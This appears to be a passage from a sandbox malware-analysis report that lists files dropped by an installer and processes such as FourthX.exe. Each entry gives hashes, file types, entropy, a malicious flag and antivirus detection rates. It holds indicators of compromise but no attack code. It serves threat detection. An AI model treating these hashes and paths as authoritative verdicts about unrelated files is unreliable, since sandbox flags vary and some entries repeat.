                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.699088014379539
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:iGmuvXb+mVV5Ule86OuFXvk64KaOMJQaJO7tZAWPN4rOnsK:/muvL+mP5Ule86OuraOMJZOHADqf
                                                                                                                                                                                                                                                                                                                                                                MD5:BF469DD8C21F5160EACD49BB59E9A370
                                                                                                                                                                                                                                                                                                                                                                SHA1:2CE4942C6CD2E22A644BAAFAED41DF9D0773477F
                                                                                                                                                                                                                                                                                                                                                                SHA-256:9ECF07708D59E0B3AE33ED553978F4B2BB806B2FB805296F73F9270C4AE01B84
                                                                                                                                                                                                                                                                                                                                                                SHA-512:FBBB805B4C65902C67F2F432BA20FFF689FABDB3652702FA176369107F688C43923C9D729095F313425847E14B138E61117ED6C03E582F82B6426BBC2C481380
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                                                                                                                                                MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                                                                                                                                                SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                                                                                                                                                SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                                                                                                                                                SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                                                                • Filename: rNUBzMB8Cm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: uvEXXJGeMd.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: 0Rajeau4sd.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: epQiTcNFEp.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: 5Yzloz244r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: e5eFd2bt37.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: OPnywcBrh6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: 3vEtFxRJ9c.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: 1fXeff6C8A.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: hqsQzin1r6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):4
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8112781244591328
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:2:2
                                                                                                                                                                                                                                                                                                                                                                MD5:53DC7048BD9B93E5C0C0847898F121D7
                                                                                                                                                                                                                                                                                                                                                                SHA1:0077262067568AF2D1E43FFDAF434C2F3D589E19
                                                                                                                                                                                                                                                                                                                                                                SHA-256:6C26BE999C603064A73DA291548DFBBA47BA691DF0C288AE297895477C00921D
                                                                                                                                                                                                                                                                                                                                                                SHA-512:A1E2525BAA6507A540280EB36E9C1F7CF369EB0C62A23875DAC51F11D1C69BFC991686CB333D2DDE30798349CA5B035028063309B975DA36C8109B8EA1014719
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:....
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):128
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.9545817380615236
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                                                                                                                                                                                                                                                                                                                MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                                                                                                                                                                                                                                                                                                                SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                                                                                                                                                                                                                                                                                                                SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                                                                                                                                                                                                                                                                                                                SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):128
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.2701231977328944
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:WAmJuXDz8/:HHzc
                                                                                                                                                                                                                                                                                                                                                                MD5:0D6174E4525CFDED5DD1C9440B9DC1E7
                                                                                                                                                                                                                                                                                                                                                                SHA1:173EF30A035CE666278904625EADCFAE09233A47
                                                                                                                                                                                                                                                                                                                                                                SHA-256:458677CDF0E1A4E87D32AB67D6A5EEA9E67CB3545D79A21A0624E6BB5E1087E7
                                                                                                                                                                                                                                                                                                                                                                SHA-512:86DA96385985A1BA3D67A8676A041CA563838F474DF33D82B6ECD90C101703B30747121A6B7281E025A3C11CE28ACCEDFC94DB4E8D38E391199458056C2CD27A
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:ccddf9e705966c2f471db9..........................................................................................................
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ISO-8859 text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):8
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.0
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:Ln:L
                                                                                                                                                                                                                                                                                                                                                                MD5:AE79E02CE475847E4AC5D7D3CABDED31
                                                                                                                                                                                                                                                                                                                                                                SHA1:79086C0933264F57FC2FF53F9226A41CD3E6B43F
                                                                                                                                                                                                                                                                                                                                                                SHA-256:8DE6C80E25D2BF6195DF92577877025828F0648E358B6E8F1F2BB693D69B211E
                                                                                                                                                                                                                                                                                                                                                                SHA-512:A824E3407A0F2C16C592AF2D1CC6B18853787041E5F1301A22E56062C6F8C03F3133EDAAFE4C04B4C2BDFFD08969D921D6BBA9C7545593AE87FB4DA2BE05D31F
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:...e....
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\FourthX.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2654720
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.545978188908966
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:iVkNC5+XxkQKlb0FjgS0+cywnZLIJK2egUmFbcP9ovzmiPKkv/m63KEll25OcXoZ:iVkYYXc4FUoNeIo2eaZdScKS/mQ/K6
                                                                                                                                                                                                                                                                                                                                                                MD5:B03886CB64C04B828B6EC1B2487DF4A4
                                                                                                                                                                                                                                                                                                                                                                SHA1:A7B9A99950429611931664950932F0E5525294A4
                                                                                                                                                                                                                                                                                                                                                                SHA-256:5DFAA8987F5D0476B835140D8A24FB1D9402E390BBE92B8565DA09581BD895FC
                                                                                                                                                                                                                                                                                                                                                                SHA-512:21D1A5A4A218411C2EC29C9CA34CE321F6514E7CA3891EDED8C3274AEB230051661A86EDA373B9A006554E067DE89D816AA1FA864ACF0934BBB16A6034930659
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\356F.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):425
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                                                                                                                                                MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                                                                                                                                                SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                                                                                                                                                SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                                                                                                                                                SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1022
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.215200866635182
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:YqHZ6T06MhmamGgb0O0bihmVmGg6CUXyhmGNmGgbxdB6hm3mGgz0Jahm2mGgbNdh:YqHZ6T06McDTb0O0bic4TDUXycRTbxd/
                                                                                                                                                                                                                                                                                                                                                                MD5:BA8512A1180143F7620E106FB9DF5F43
                                                                                                                                                                                                                                                                                                                                                                SHA1:2EF20B9029C7C89ED134DD87F6A9403D4103031F
                                                                                                                                                                                                                                                                                                                                                                SHA-256:171640BF14335CC6403F09E4C72C11146C7393E63A9273C71B98C2D456202BA9
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2B83F9321A98090269D610D552C19B06136719FCD9F310437B2852F938DED711A1D09EABF017BF9AAEA980F68CEC6703234808A5CAB74C9A52AE4903A0DAE797
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":3053123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":3043123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":3033123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3023123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":3013123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3003123472,"LastSwitchedHighPart":31061843,
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
